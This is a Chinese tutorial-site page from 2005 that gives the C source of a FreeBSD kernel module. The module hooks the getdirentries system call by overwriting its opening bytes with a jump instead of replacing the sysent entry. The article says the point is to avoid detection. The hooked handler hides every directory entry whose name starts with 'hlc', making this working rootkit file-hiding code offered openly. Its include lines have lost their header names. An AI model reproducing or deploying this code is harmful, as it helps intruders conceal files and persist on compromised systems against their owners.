庞大资源库的计算机教程网站!
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
首页 操作系统 程序设计 图形图像 媒体动画 机械电子 WEB开发 数 据 库 办公系列 路由技术 网络原理 网络应用
认证考试 安全技术
首页>操作系统>FreeBSD>原理与内核>正文
资料搜索
Google搜索
Google
返回上级列表

推荐文章

快速保存网页中所有图片的方法
Windows中让光驱巧妙“隐身”技
防范非法用户入侵Win 2000/XP系
两款比较典型的ASP木马防范方法
有关表格边框的css语法整理
Windows XP中可以被禁用的服务
SQL Server导出导入数据方法
Javascript所有对象的属性的获
网页(HTML)中的特殊字符
与篮球共舞,尽显模式本色
QQ病毒的手工清除方法
Photoshop为极品美女打造性感睫
天衣无缝:IIS与PHP水火也相容
SQL Server存储过程编写和优化

不直接替换系统调用的kld

 作者:本站收集   日期:2005-4-16
字号选择〖 〗/ 双击滚屏 单击停止   
如果在sysent表里面直接替换系统调用,很容易被发现,我们可以通过改写系统调用的

前面几个字节(jmp 新的系统调用)来达到更好的隐藏效果,而不是直接替换系统调用.

下面的代码就是具体的实现:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

MALLOC_DEFINE(HLC_DIR,"dir","struct");

#define hidename "hlc"

#define hidelength 3

unsigned char new_call_code[7]="\xb8\x00\x00\x00\x00"/* movl $0,%eax */

"\xff\xe0"; /* jmp *%eax */



unsigned char old_call_code[7];

static int filehide(char *name)

{

char buf[hidelength+1];

bcopy(name,buf,hidelength);

buf[hidelength]='\0';

if(!strcmp(buf,hidename))

return 1;

return 0;

}



static int new_getdirentries(struct proc *p,register struct getdirentries_args *uap)

{

int size,count;

struct dirent *dir,*current;

bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

getdirentries(p,uap);

bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

size=p->p_retval[0];

if(size>0)

{

MALLOC(dir,struct dirent *,size,HLC_DIR,M_NOWAIT);

copyin(uap->buf,dir,size);

current=dir;

count=size;

while((count>0)&&(current->d_reclen!=0))

{



count-=current->d_reclen;



if(filehide(current->d_name))

{

size-=current->d_reclen;

if(count!=0)

{

bcopy((char *)current+current->d_reclen,current,count);

}

continue;

}

if(count!=0)

current=(struct dirent *)((char *)current+current->d_reclen);

}

p->p_retval[0]=size;

copyout(dir,uap->buf,size);

free(dir,HLC_DIR);

}

return 0;

}



static int load( module_t *mod,int cmd,void *arg)

{

int error=0;

switch(cmd)

{

case MOD_LOAD:

{

*(long*)&new_call_code[1]=(long)new_getdirentries;

bcopy(sysent[SYS_getdirentries].sy_call,old_call_code, sizeof(old_call_code));



bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

printf("install ok\n");

break;

}

case MOD_UNLOAD:

{



bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

break;

}

default:

{

error=EINVAL;

break;

}

}

return error;

}



static moduledata_t addjmp_mod={

"addjmp",

load,

NULL

};



DECLARE_MODULE(addjmp,addjmp_mod,SI_SUB_DRIVERS,SI_ORDER_MIDDLE);
上一篇:UFS2新特性之ACL初探    下一篇:FreeBSD 5 内核源代码分析之中断处理  
[发送给好友]  [关闭窗口]  [返回顶部]   转载请注明来源:www.it00.com   
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
责任编辑: 原点 投稿作者: 本站收集
信息来源: 网络 录入时间: 2005-4-16
关于我们 - 广告服务 - 版权申明 - 网站地图 - 联系方式 - 总编信箱 - 会员投稿